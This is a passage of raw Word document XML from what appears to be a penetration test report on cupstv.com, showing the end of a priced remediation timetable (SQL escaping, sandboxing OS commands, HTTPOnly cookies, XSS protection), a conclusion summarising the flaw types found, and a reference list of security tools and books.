        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D77CC6" w14:paraId="1320325A" w14:textId="77777777" w:rsidTr="00D77CC6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64C62626" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="00D77CC6" w:rsidP="000042DC">
            <w:r>
              <w:t xml:space="preserve">Create Black and White list for webserver  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3172" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20B27BF7" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="00D77CC6" w:rsidP="000042DC">
            <w:r>
              <w:t>27/12/2017 – 28/12/2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2717" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A4A6561" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="006B753E" w:rsidP="000042DC">
            <w:r>
              <w:t>£480</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D77CC6" w14:paraId="0B38F062" w14:textId="77777777" w:rsidTr="00D77CC6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="553860C4" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="00D77CC6" w:rsidP="000042DC">
            <w:r>
              <w:t>Ensure default users are disabled within the SQL Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3172" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EE51046" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="00D77CC6" w:rsidP="000042DC">
            <w:r>
              <w:t>29/12/2017 – 29/12/2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2717" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64AE3BCC" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="006B753E" w:rsidP="000042DC">
            <w:r>
              <w:t>£240</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D77CC6" w14:paraId="68379AF4" w14:textId="77777777" w:rsidTr="00D77CC6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="226A88F7" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="00D77CC6" w:rsidP="000042DC">
            <w:r>
              <w:t>Setup SQL Escape for all sections with user input</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3172" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C152965" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="00D77CC6" w:rsidP="000042DC">
            <w:r>
              <w:t>3/01/2018 – 05/01/2018</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02E1F457" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="00D77CC6" w:rsidP="000042DC">
            <w:r>
              <w:t>8/01/2018 – 10/01/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2717" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31676FC5" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="006B753E" w:rsidP="000042DC">
            <w:r>
              <w:t>£1440</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D77CC6" w14:paraId="587AF7DA" w14:textId="77777777" w:rsidTr="00D77CC6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="384070F0" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="00D77CC6" w:rsidP="000042DC">
            <w:r>
              <w:t>Configure webserver to use a library call</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3172" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B39690D" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="00D77CC6" w:rsidP="000042DC">
            <w:r>
              <w:t>11/01/2018 – 12/01/2018</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="047FE49A" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="00D77CC6" w:rsidP="000042DC">
            <w:r>
              <w:t xml:space="preserve">15/01/2018 </w:t>
            </w:r>
            <w:r w:rsidR="006B753E">
              <w:t>–</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006B753E">
              <w:t>17/01/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2717" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3971A95C" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="006B753E" w:rsidP="000042DC">
            <w:r>
              <w:t>£1200</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D77CC6" w14:paraId="541A5EBC" w14:textId="77777777" w:rsidTr="00D77CC6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00834057" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="006B753E" w:rsidP="000042DC">
            <w:r>
              <w:t>Configure OS commands to store locally in session states</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3172" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4647EA6D" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="006B753E" w:rsidP="000042DC">
            <w:r>
              <w:t>18/01/2018 – 19/01/2018</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FF92081" w14:textId="77777777" w:rsidR="006B753E" w:rsidRDefault="006B753E" w:rsidP="000042DC"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2717" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2360D00E" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="006B753E" w:rsidP="000042DC">
            <w:r>
              <w:t>£480</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D77CC6" w14:paraId="7F5035F5" w14:textId="77777777" w:rsidTr="00D77CC6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12B12E3D" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="006B753E" w:rsidP="000042DC">
            <w:r>
              <w:t>Build Sandbox Environment that enforces boundaries for the OS commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3172" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="324788C4" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="006B753E" w:rsidP="000042DC">
            <w:r>
              <w:t>22/01/2018 – 25/01/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2717" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D56A04A" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="006B753E" w:rsidP="000042DC">
            <w:r>
              <w:t>£960</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D77CC6" w14:paraId="5F94ED03" w14:textId="77777777" w:rsidTr="00D77CC6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4332FA9B" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRPr="006B753E" w:rsidRDefault="006B753E" w:rsidP="000042DC">
            <w:r w:rsidRPr="006B753E">
              <w:t xml:space="preserve">Ensure </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006B753E">
              <w:t>HTTPOnly</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006B753E">
              <w:t xml:space="preserve"> flag is setup for all cookies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3172" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15C4D6DD" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="006B753E" w:rsidP="000042DC">
            <w:r>
              <w:t>26/01/2018 – 26/01/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2717" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B73ABDC" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="006B753E" w:rsidP="000042DC">
            <w:r>
              <w:t>£240</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B753E" w14:paraId="2CE56640" w14:textId="77777777" w:rsidTr="00D77CC6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F5580FA" w14:textId="77777777" w:rsidR="006B753E" w:rsidRPr="006B753E" w:rsidRDefault="006B753E" w:rsidP="006B753E">
            <w:r w:rsidRPr="006B753E">
              <w:t xml:space="preserve">Ensure XSS Protection is enabled </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E41DE72" w14:textId="77777777" w:rsidR="006B753E" w:rsidRPr="006B753E" w:rsidRDefault="006B753E" w:rsidP="006B753E"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3172" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FFF9D57" w14:textId="77777777" w:rsidR="006B753E" w:rsidRDefault="006B753E" w:rsidP="006B753E">
            <w:r>
              <w:t>26/01/2018 – 26/01/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2717" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C442252" w14:textId="77777777" w:rsidR="006B753E" w:rsidRDefault="006B753E" w:rsidP="006B753E">
            <w:r>
              <w:t>£240</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B753E" w14:paraId="6C293E01" w14:textId="77777777" w:rsidTr="00D77CC6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77908382" w14:textId="77777777" w:rsidR="006B753E" w:rsidRPr="006B753E" w:rsidRDefault="006B753E" w:rsidP="006B753E">
            <w:r w:rsidRPr="006B753E">
              <w:lastRenderedPageBreak/>
              <w:t>Ensure Auto complete is disabled</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E11FF65" w14:textId="77777777" w:rsidR="006B753E" w:rsidRPr="006B753E" w:rsidRDefault="006B753E" w:rsidP="006B753E"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3172" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="137FB88F" w14:textId="77777777" w:rsidR="006B753E" w:rsidRDefault="006B753E" w:rsidP="006B753E">
            <w:r>
              <w:t>26/01/2018 – 26/01/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2717" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25D80AF6" w14:textId="77777777" w:rsidR="006B753E" w:rsidRDefault="006B753E" w:rsidP="006B753E">
            <w:r>
              <w:t>£240</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B753E" w14:paraId="524F7CEA" w14:textId="77777777" w:rsidTr="006B753E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3127" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="053CA6E0" w14:textId="77777777" w:rsidR="006B753E" w:rsidRDefault="006B753E" w:rsidP="006B753E"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3172" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="02DA9241" w14:textId="77777777" w:rsidR="006B753E" w:rsidRDefault="006B753E" w:rsidP="006B753E"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2717" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="162987E8" w14:textId="77777777" w:rsidR="006B753E" w:rsidRDefault="006B753E" w:rsidP="006B753E">
            <w:r>
              <w:t>£6960</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E77FF3D" w14:textId="77777777" w:rsidR="000042DC" w:rsidRDefault="000042DC" w:rsidP="000042DC"/>
    <w:p w14:paraId="6C87A604" w14:textId="77777777" w:rsidR="00124EDF" w:rsidRDefault="006B753E" w:rsidP="00124EDF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc501124794"/>
      <w:r w:rsidRPr="006B753E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">9. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="2AF8E602" w14:textId="77777777" w:rsidR="00124EDF" w:rsidRDefault="00124EDF" w:rsidP="00124EDF"/>
    <w:p w14:paraId="299CACA0" w14:textId="77777777" w:rsidR="00124EDF" w:rsidRDefault="00124EDF" w:rsidP="00124EDF">
      <w:r>
        <w:t xml:space="preserve">This penetration test begun with the sole purpose of testing cupstv.com. It begun with building a framework or structure to build these tests around. The framework started with research and then was completed with </w:t>
      </w:r>
      <w:r w:rsidR="00507B76">
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> running attacks. During these tests multiple tools have been used to attempt to find flaws within the website cupstv.com. The scans used ranged from a general scanner such as OWASP ZAP</w:t>
      </w:r>
      <w:r w:rsidR="00CC1C29">
        <w:t>, to a scanner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which specifically looked-for SQL Injection related flaws such as SQL Map. The scans found two high risk flaws within the website which includes one of the most popular attacks SQL Injection. The other high-risk flaw was Remote OS Command Injection. There were also three low risk flaws discussed, these flaws could be exploited to use Cross Site Scripting, Session stealing and can give an attacker the ability to find and steal user passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A973E0E" w14:textId="77777777" w:rsidR="00B74EC3" w:rsidRDefault="00B74EC3" w:rsidP="00124EDF"/>
    <w:p w14:paraId="17348750" w14:textId="77777777" w:rsidR="00B74EC3" w:rsidRPr="00124EDF" w:rsidRDefault="00B74EC3" w:rsidP="00124EDF">
      <w:r>
        <w:t>Once the flaws were identified finding solutions was the next logical step, each flaw was broken down and explanations on how to patch the flaws were discussed. These included creating Black and White lists to stop user input damaging the web pages, inputting SQL escapes in areas where user input is required. Although the fixes for the high-risk flaws are a little more difficult to patch thankfully the low risk flaws had more basic fixes, these fixes includ</w:t>
      </w:r>
      <w:r w:rsidR="00CC1C29">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ensuring certain features such as X-XSS-Protection were in fact enabled. Once the fixes for these issues were found the final process within this report was designing a time-table of when the issues will be resolved along with a cost of the hourly rate and final pricing. Now that this report is now complete the final steps is to begin implementing these changes which will need to be done immediately. From this report</w:t>
      </w:r>
      <w:r w:rsidR="00CC1C29">
        <w:t xml:space="preserve"> it is proven that cupstv.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is potentially at risk against </w:t>
      </w:r>
      <w:r w:rsidR="00CC1C29">
        <w:t>attackers</w:t>
      </w:r>
      <w:r w:rsidR="0058527C">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5537D503" w14:textId="77777777" w:rsidR="00236B28" w:rsidRDefault="006B753E" w:rsidP="00236B28">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc501124795"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="001B121C" w:rsidRPr="001B121C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>.Refrences</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="59F3C2D5" w14:textId="77777777" w:rsidR="008A3D97" w:rsidRPr="008A3D97" w:rsidRDefault="008A3D97" w:rsidP="008A3D97"/>
    <w:p w14:paraId="7786510C" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="008A3D97" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">ADDIN Mendeley Bibliography CSL_BIBLIOGRAPHY </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CC1C29" w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidR="00CC1C29" w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>“Penetration Testing Framework 0.59.” [Online]. Available: http://www.vulnerabilityassessment.co.uk/Penetration Test.html. [Accessed: 08-Dec-2017].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E03A3C" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>“Network Tools: DNS,IP,Email.” [Online]. Available: https://mxtoolbox.com/SuperTool.aspx?action=http%3A%2F%2Fcupstv.com&amp;run=toolpage#. [Accessed: 08-Dec-2017].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1326F9D3" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>“Nmap: the Network Mapper - Free Security Scanner.” [Online]. Available: https://nmap.org/. [Accessed: 08-Dec-2017].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594AC807" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">J. Clarke, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>SQL injection attacks and defense</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>. Elsevier, 2012.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E88D1C" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">A. Curioso, R. Bradford, and P. Galbraith, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Expert PHP and MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>. Wiley Pub, 2010.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087A397A" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">V. Vaswani, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>MySQL database usage &amp;amp; administration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>. McGraw-Hill, 2010.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FBA9AD" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>“sqlmap: automatic SQL injection and database takeover tool.” [Online]. Available: http://sqlmap.org/. [Accessed: 08-Dec-2017].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A94010" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[8]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>“OWASP Zed Attack Proxy Project - OWASP.” [Online]. Available: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project. [Accessed: 08-Dec-2017].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100BAD70" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[9]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">B. T. Pour and S. M. S. Sajjadi, “Study of SQL Injection Attacks and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Countermeasures,” </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Int. J. Comput. Commun. Eng.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>, vol. 2, no. 5, 2013.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B094C79" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[10]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">B. Perry, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Gray hat C# : a hacker’s guide to creating and automating security tools</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>. .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC78CEF" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
